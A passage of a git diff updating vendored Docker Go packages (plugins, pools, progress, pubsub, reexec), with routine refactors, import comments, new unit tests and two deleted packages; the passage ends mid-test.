+104,7 @@ func (l *localRegistry) Plugin(name string) (*Plugin, error) { return readPluginInfo(name, p) } } - return nil, ErrNotFound + return nil, errors.Wrapf(ErrNotFound, "could not find plugin %s in v1 plugin registry", name) } func readPluginInfo(name, path string) (*Plugin, error) { diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go index 03f9d00319..28fda41bad 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "io/ioutil" @@ -66,7 +66,7 @@ func TestFileSpecPlugin(t *testing.T) { t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr) } - if p.TLSConfig.InsecureSkipVerify != true { + if !p.TLSConfig.InsecureSkipVerify { t.Fatalf("Expected TLS verification to be skipped") } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go index 693a47e394..58058f2828 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go @@ -1,5 +1,5 @@ // +build !windows -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go index 3e2d506b97..b4aefc83e4 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go @@ -1,14 +1,17 @@ // +build !windows -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "fmt" + "io/ioutil" "net" "os" "path/filepath" "reflect" "testing" + + "gotest.tools/assert" ) func TestLocalSocket(t *testing.T) { @@ -53,9 +56,104 @@ func TestLocalSocket(t *testing.T) { if p.Addr != addr { t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr) } - if p.TLSConfig.InsecureSkipVerify != true { + if !p.TLSConfig.InsecureSkipVerify { t.Fatalf("Expected TLS verification to be skipped") } l.Close() } } + +func TestScan(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + pluginNames, err := Scan() + if err != nil { + t.Fatal(err) + } + if pluginNames != nil { + t.Fatal("Plugin names should be empty.") + } + + path := filepath.Join(tmpdir, "echo.spec") + addr := "unix://var/lib/docker/plugins/echo.sock" + name := "echo" + + err = os.MkdirAll(filepath.Dir(path), 0755) + if err != nil { + t.Fatal(err) + } + + err = ioutil.WriteFile(path, []byte(addr), 0644) + if err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin(name) + assert.NilError(t, err) + + pluginNamesNotEmpty, err := Scan() + if err != nil { + t.Fatal(err) + } + if len(pluginNamesNotEmpty) != 1 { + t.Fatalf("expected 1 plugin entry: %v", pluginNamesNotEmpty) + } + if p.Name() != pluginNamesNotEmpty[0] { + t.Fatalf("Unable to scan plugin with name %s", p.name) + } +} + +func TestScanNotPlugins(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + // not that `Setup()` above sets the sockets path and spec path dirs, which + // `Scan()` uses to find plugins to the returned `tmpdir` + + notPlugin := filepath.Join(tmpdir, "not-a-plugin") + if err := os.MkdirAll(notPlugin, 0700); err != nil { + t.Fatal(err) + } + + // this is named differently than the dir it's in, so the scanner should ignore it + l, err := net.Listen("unix", filepath.Join(notPlugin, "foo.sock")) + if err != nil { + t.Fatal(err) + } + defer l.Close() + + // same let's test a spec path + f, err := os.Create(filepath.Join(notPlugin, "foo.spec")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + names, err := Scan() + if err != nil { + t.Fatal(err) + } + if len(names) != 0 { + t.Fatalf("expected no plugins, got %v", names) + } + + // Just as a sanity check, let's make an entry that the scanner should read + f, err = os.Create(filepath.Join(notPlugin, "not-a-plugin.spec")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + names, err = Scan() + if err != nil { + t.Fatal(err) + } + if len(names) != 1 { + t.Fatalf("expected 1 entry in result: %v", names) + } + if names[0] != "not-a-plugin" { + t.Fatalf("expected plugin named `not-a-plugin`, got: %s", names[0]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go index d7c1fe4942..f0af3477f4 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go b/vendor/github.com/docker/docker/pkg/plugins/errors.go index 7988471026..6735c304bf 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/errors.go +++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go index b19c0d52f1..ce98078f87 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go @@ -1,12 +1,26 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( - "errors" + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" "path/filepath" "runtime" "sync" "testing" "time" + + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +const ( + fruitPlugin = "fruit" + fruitImplements = "apple" ) // regression test for deadlock in handlers @@ -40,5 +54,101 @@ func testActive(t *testing.T, p *Plugin) { t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l) case <-done: } +} + +func TestGet(t *testing.T) { + p := &Plugin{name: fruitPlugin, activateWait: sync.NewCond(&sync.Mutex{})} + p.Manifest = &Manifest{Implements: []string{fruitImplements}} + storage.plugins[fruitPlugin] = p + + plugin, err := Get(fruitPlugin, fruitImplements) + if err != nil { + t.Fatal(err) + } + if p.Name() != plugin.Name() { + t.Fatalf("No matching plugin with name %s found", plugin.Name()) + } + if plugin.Client() != nil { + t.Fatal("expected nil Client but found one") + } + if !plugin.IsV1() { + t.Fatal("Expected true for V1 plugin") + } + + // check negative case where plugin fruit doesn't implement banana + _, err = Get("fruit", "banana") + assert.Equal(t, errors.Cause(err), ErrNotImplements) + + // check negative case where plugin vegetable doesn't exist + _, err = Get("vegetable", "potato") + assert.Equal(t, errors.Cause(err), ErrNotFound) +} + +func TestPluginWithNoManifest(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{fruitImplements}} + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(m); err != nil { + t.Fatal(err) + } + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, &buf) + }) + + p := &Plugin{ + name: fruitPlugin, + activateWait: sync.NewCond(&sync.Mutex{}), + Addr: addr, + TLSConfig: &tlsconfig.Options{InsecureSkipVerify: true}, + } + storage.plugins[fruitPlugin] = p + + plugin, err := Get(fruitPlugin, fruitImplements) + if err != nil { + t.Fatal(err) + } + if p.Name() != plugin.Name() { + t.Fatalf("No matching plugin with name %s found", plugin.Name()) + } +} + +func TestGetAll(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "example", + "Addr": "https://example.com/docker/plugin" +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + plugin.Manifest = &Manifest{Implements: []string{"apple"}} + storage.plugins["example"] = plugin + + fetchedPlugins, err := GetAll("apple") + if err != nil { + t.Fatal(err) + } + if fetchedPlugins[0].Name() != plugin.Name() { + t.Fatalf("Expected to get plugin with name %s", plugin.Name()) + } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md index 0418a3e00a..5f6a421f19 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md @@ -30,7 +30,7 @@ Where: - `--type` is the name of the interface to use - `--name` is the subsystem that the plugin "Implements" - `-i` is the input file containing the interface definition -- `-o` is the output file where the the generated code should go +- `-o` is the output file where the generated code should go **Note**: The generated code will use the same package name as the one defined in the input file diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go index 5695dcc2d4..d27e28ebef 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go @@ -1,17 +1,11 @@ -package foo +package foo // import "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures" import ( - "fmt" - aliasedio "io" "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" ) -var ( - errFakeImport = fmt.Errorf("just to import fmt for imports tests") -) - type wobble struct { Some string Val string diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go index 1937d1786c..c603f6778c 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go @@ -1,4 +1,4 @@ -package otherfixture +package otherfixture // import "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" // Spaceship is a fixture for tests type Spaceship struct{} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go index a1b1ac9567..fe7fa5ade6 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go @@ -136,7 +136,7 @@ func TestParseWithMultipleFuncs(t *testing.T) { } } -func TestParseWithUnamedReturn(t *testing.T) { +func TestParseWithUnnamedReturn(t *testing.T) { _, err := Parse(testFixture, "Fooer4") if !strings.HasSuffix(err.Error(), errBadReturn.Error()) { t.Fatalf("expected ErrBadReturn, got %v", err) diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go index c0059cba75..6962079df9 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go @@ -20,17 +20,20 @@ // if err != nil { // return fmt.Errorf("Error looking up volume plugin example: %v", err) // } -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "errors" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) +// ProtocolSchemeHTTPV1 is the name of the protocol used for interacting with plugins using this package. +const ProtocolSchemeHTTPV1 = "moby.plugins.http/v1" + var ( // ErrNotImplements is returned if the plugin does not implement the requested driver. ErrNotImplements = errors.New("Plugin does not implement the requested driver") @@ -88,6 +91,11 @@ func (p *Plugin) Client() *Client { return p.client } +// Protocol returns the protocol name/version used for plugins in this package. +func (p *Plugin) Protocol() string { + return ProtocolSchemeHTTPV1 +} + // IsV1 returns true for V1 plugins and false otherwise. func (p *Plugin) IsV1() bool { return true diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go deleted file mode 100644 index 9c5a0b5632..0000000000 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go +++ /dev/null @@ -1,7 +0,0 @@ -package plugins - -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For v1 plugins, this always returns the host's root directory. -func (p *Plugin) BasePath() string { - return "/" -} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go new file mode 100644 index 0000000000..cdfbe93458 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go @@ -0,0 +1,9 @@ +// +build !windows + +package plugins // import "github.com/docker/docker/pkg/plugins" + +// ScopedPath returns the path scoped to the plugin's rootfs. +// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host. +func (p *Plugin) ScopedPath(s string) string { + return s +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go index 3c8d8feb83..ddf1d786c6 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go @@ -1,8 +1,7 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For Windows v1 plugins, this returns an empty string, since the plugin is already aware -// of the absolute path of the mount. -func (p *Plugin) BasePath() string { - return "" +// ScopedPath returns the path scoped to the plugin's rootfs. +// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host. +func (p *Plugin) ScopedPath(s string) string { + return s } diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go index 5be146af65..76d3bdb712 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go @@ -1,4 +1,4 @@ -package transport +package transport // import "github.com/docker/docker/pkg/plugins/transport" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go new file mode 100644 index 0000000000..78ab23724b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go @@ -0,0 +1,21 @@ +package transport // import "github.com/docker/docker/pkg/plugins/transport" + +import ( + "io" + "net/http" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestHTTPTransport(t *testing.T) { + var r io.Reader + roundTripper := &http.Transport{} + newTransport := NewHTTPTransport(roundTripper, "http", "0.0.0.0") + request, err := newTransport.NewRequest("", r) + if err != nil { + t.Fatal(err) + } + assert.Check(t, is.Equal("POST", request.Method)) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go index d7f1e2100c..9cb13335a8 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go @@ -1,4 +1,4 @@ -package transport +package transport // import "github.com/docker/docker/pkg/plugins/transport" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go index 5c5aead698..46339c282f 100644 --- a/vendor/github.com/docker/docker/pkg/pools/pools.go +++ b/vendor/github.com/docker/docker/pkg/pools/pools.go @@ -7,7 +7,7 @@ // // Utility functions which operate on pools should be added to this // package to allow them to be reused. -package pools +package pools // import "github.com/docker/docker/pkg/pools" import ( "bufio" @@ -17,15 +17,16 @@ import ( "github.com/docker/docker/pkg/ioutils" ) +const buffer32K = 32 * 1024 + var ( // BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer. BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K) // BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer. BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K) + buffer32KPool = newBufferPoolWithSize(buffer32K) ) -const buffer32K = 32 * 1024 - // BufioReaderPool is a bufio reader that uses sync.Pool. type BufioReaderPool struct { pool sync.Pool @@ -54,11 +55,31 @@ func (bufPool *BufioReaderPool) Put(b *bufio.Reader) { bufPool.pool.Put(b) } +type bufferPool struct { + pool sync.Pool +} + +func newBufferPoolWithSize(size int) *bufferPool { + return &bufferPool{ + pool: sync.Pool{ + New: func() interface{} { return make([]byte, size) }, + }, + } +} + +func (bp *bufferPool) Get() []byte { + return bp.pool.Get().([]byte) +} + +func (bp *bufferPool) Put(b []byte) { + bp.pool.Put(b) +} + // Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy. func Copy(dst io.Writer, src io.Reader) (written int64, err error) { - buf := BufioReader32KPool.Get(src) - written, err = io.Copy(dst, buf) - BufioReader32KPool.Put(buf) + buf := buffer32KPool.Get() + written, err = io.CopyBuffer(dst, src, buf) + buffer32KPool.Put(buf) return } diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go index 1661b780c9..7ff01ce3d5 100644 --- a/vendor/github.com/docker/docker/pkg/pools/pools_test.go +++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go @@ -1,4 +1,4 @@ -package pools +package pools // import "github.com/docker/docker/pkg/pools" import ( "bufio" @@ -6,6 +6,9 @@ import ( "io" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) { @@ -92,22 +95,16 @@ func TestBufioWriterPoolPutAndGet(t *testing.T) { buf := new(bytes.Buffer) bw := bufio.NewWriter(buf) writer := BufioWriter32KPool.Get(bw) - if writer == nil { - t.Fatalf("BufioReaderPool should not return a nil writer.") - } + assert.Assert(t, writer != nil) + written, err := writer.Write([]byte("foobar")) - if err != nil { - t.Fatal(err) - } - if written != 6 { - t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(6, written)) + // Make sure we Flush all the way ? writer.Flush() bw.Flush() - if len(buf.Bytes()) != 6 { - t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes())) - } + assert.Check(t, is.Len(buf.Bytes(), 6)) // Reset the buffer buf.Reset() BufioWriter32KPool.Put(writer) @@ -159,3 +156,8 @@ func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) { t.Fatalf("The ReaderCloser should have been closed, it is not.") } } + +func TestBufferPoolPutAndGet(t *testing.T) { + buf := buffer32KPool.Get() + buffer32KPool.Put(buf) +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go index fcf31173cf..9aea591954 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progress.go +++ b/vendor/github.com/docker/docker/pkg/progress/progress.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "fmt" @@ -16,6 +16,11 @@ type Progress struct { Current int64 Total int64 + // If true, don't show xB/yB + HideCounts bool + // If not empty, use units instead of bytes for counts + Units string + // Aux contains extra information not presented to the user, such as // digests for push signing. Aux interface{} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go index 6b3927eecf..7ca07dc640 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progressreader.go +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go index b14d401561..e7081cc1f4 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "bytes" @@ -14,7 +14,7 @@ func TestOutputOnPrematureClose(t *testing.T) { pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") - part := make([]byte, 4, 4) + part := make([]byte, 4) _, err := io.ReadFull(pr, part) if err != nil { pr.Close() diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go deleted file mode 100644 index dd52b9082f..0000000000 --- a/vendor/github.com/docker/docker/pkg/promise/promise.go +++ /dev/null @@ -1,11 +0,0 @@ -package promise - -// Go is a basic promise implementation: it wraps calls a function in a goroutine, -// and returns a channel which will later return the function's return value. -func Go(f func() error) chan error { - ch := make(chan error, 1) - go func() { - ch <- f() - }() - return ch -} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go index 09364617e4..76033ed9e4 100644 --- a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go @@ -1,4 +1,4 @@ -package pubsub +package pubsub // import "github.com/docker/docker/pkg/pubsub" import ( "sync" @@ -53,6 +53,16 @@ func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} { return ch } +// SubscribeTopicWithBuffer adds a new subscriber that filters messages sent by a topic. +// The returned channel has a buffer of the specified size. +func (p *Publisher) SubscribeTopicWithBuffer(topic topicFunc, buffer int) chan interface{} { + ch := make(chan interface{}, buffer) + p.m.Lock() + p.subscribers[ch] = topic + p.m.Unlock() + return ch +} + // Evict removes the specified subscriber from receiving any more messages. func (p *Publisher) Evict(sub chan interface{}) { p.m.Lock() diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go index d6b0a1d59a..98e158248f 100644 --- a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go @@ -1,4 +1,4 @@ -package pubsub +package pubsub // import "github.com/docker/docker/pkg/pubsub" import ( "fmt" @@ -20,7 +20,7 @@ func TestSendToOneSub(t *testing.T) { func TestSendToMultipleSubs(t *testing.T) { p := NewPublisher(100*time.Millisecond, 10) - subs := []chan interface{}{} + var subs []chan interface{} subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) p.Publish("hi") @@ -52,7 +52,7 @@ func TestEvictOneSub(t *testing.T) { func TestClosePublisher(t *testing.T) { p := NewPublisher(100*time.Millisecond, 10) - subs := []chan interface{}{} + var subs []chan interface{} subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) p.Close() @@ -99,7 +99,7 @@ func newTestSubscriber(p *Publisher) *testSubscriber { // for testing with -race func TestPubSubRace(t *testing.T) { p := NewPublisher(0, 1024) - var subs [](*testSubscriber) + var subs []*testSubscriber for j := 0; j < 50; j++ { subs = append(subs, newTestSubscriber(p)) } @@ -120,7 +120,7 @@ func BenchmarkPubSub(b *testing.B) { for i := 0; i < b.N; i++ { b.StopTimer() p := NewPublisher(0, 1024) - var subs [](*testSubscriber) + var subs []*testSubscriber for j := 0; j < 50; j++ { subs = append(subs, newTestSubscriber(p)) } diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go deleted file mode 100644 index 70de4d1304..0000000000 --- a/vendor/github.com/docker/docker/pkg/random/random.go +++ /dev/null @@ -1,71 +0,0 @@ -package random - -import ( - cryptorand "crypto/rand" - "io" - "math" - "math/big" - "math/rand" - "sync" - "time" -) - -// Rand is a global *rand.Rand instance, which initialized with NewSource() source. -var Rand = rand.New(NewSource()) - -// Reader is a global, shared instance of a pseudorandom bytes generator. -// It doesn't consume entropy. -var Reader io.Reader = &reader{rnd: Rand} - -// copypaste from standard math/rand -type lockedSource struct { - lk sync.Mutex - src rand.Source -} - -func (r *lockedSource) Int63() (n int64) { - r.lk.Lock() - n = r.src.Int63() - r.lk.Unlock() - return -} - -func (r *lockedSource) Seed(seed int64) { - r.lk.Lock() - r.src.Seed(seed) - r.lk.Unlock() -} - -// NewSource returns math/rand.Source safe for concurrent use and initialized -// with current unix-nano timestamp -func NewSource() rand.Source { - var seed int64 - if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { - // This should not happen, but worst-case fallback to time-based seed. - seed = time.Now().UnixNano() - } else { - seed = cryptoseed.Int64() - } - return &lockedSource{ - src: rand.NewSource(seed), - } -} - -type reader struct { - rnd *rand.Rand -} - -func (r *reader) Read(b []byte) (int, error) { - i := 0 - for { - val := r.rnd.Int63() - for val > 0 { - b[i] = byte(val) - i++ - if i == len(b) { - return i, nil - } - val >>= 8 - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go deleted file mode 100644 index cf405f78cb..0000000000 --- a/vendor/github.com/docker/docker/pkg/random/random_test.go +++ /dev/null @@ -1,22 +0,0 @@ -package random - -import ( - "math/rand" - "sync" - "testing" -) - -// for go test -v -race -func TestConcurrency(t *testing.T) { - rnd := rand.New(NewSource()) - var wg sync.WaitGroup - - for i := 0; i < 10; i++ { - wg.Add(1) - go func() { - rnd.Int63() - wg.Done() - }() - } - wg.Wait() -} diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md index 45592ce85a..6658f69b69 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/README.md +++ b/vendor/github.com/docker/docker/pkg/reexec/README.md @@ -1,4 +1,4 @@ -## reexec +# reexec The `reexec` package facilitates the busybox style reexec of the docker binary that we require because of the forking limitations of using Go. Handlers can be registered with a name and the argv 0 of diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go index 34ae2a9dcd..efea71794f 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go @@ -1,10 +1,10 @@ -// +build linux - -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" "syscall" + + "golang.org/x/sys/unix" ) // Self returns the path to the current process's binary. @@ -22,7 +22,7 @@ func Command(args ...string) *exec.Cmd { Path: Self(), Args: args, SysProcAttr: &syscall.SysProcAttr{ - Pdeathsig: syscall.SIGTERM, + Pdeathsig: unix.SIGTERM, }, } } diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go index 778a720e3b..ceaabbdeee 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go @@ -1,6 +1,6 @@ -// +build freebsd solaris darwin +// +build freebsd darwin -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go index 76edd82427..09fb4b2d29 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go @@ -1,12 +1,12 @@ -// +build !linux,!windows,!freebsd,!solaris,!darwin +// +build !linux,!windows,!freebsd,!darwin -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" ) -// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin. +// Command is unsupported on operating systems apart from Linux, Windows, and Darwin. func Command(args ...string) *exec.Cmd { return nil } diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go index ca871c4227..438226890f 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go index c56671d919..f8ccddd599 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/reexec.go +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go @@ -1,4 +1,4 @@ -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go new file mode 100644 index 0000000000..44675e7b63 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go @@ -0,0 +1,52 @@ +package reexec // import "github.com/docker/docker/pkg/reexec" + +import ( + "os" + "os/exec" + "testing" + + "gotest.tools/assert" +) + +func init() { + Register("reexec", func() { + panic("Return Error") + }) + Init() +} + +func TestRegister(t *testing.T) { + defer func() { + if r := recover(); r != nil { + assert.Equal(t, `reexec func already registered under name "reexec"`, r) + } + }() + Register("reexec", func() {}) +} + +func TestCommand(t *testing.T) { + cmd := Command("reexec") + w, err := cmd.StdinPipe() + assert.NilError(t, err, "Error on pipe creation: %v", err) + defer 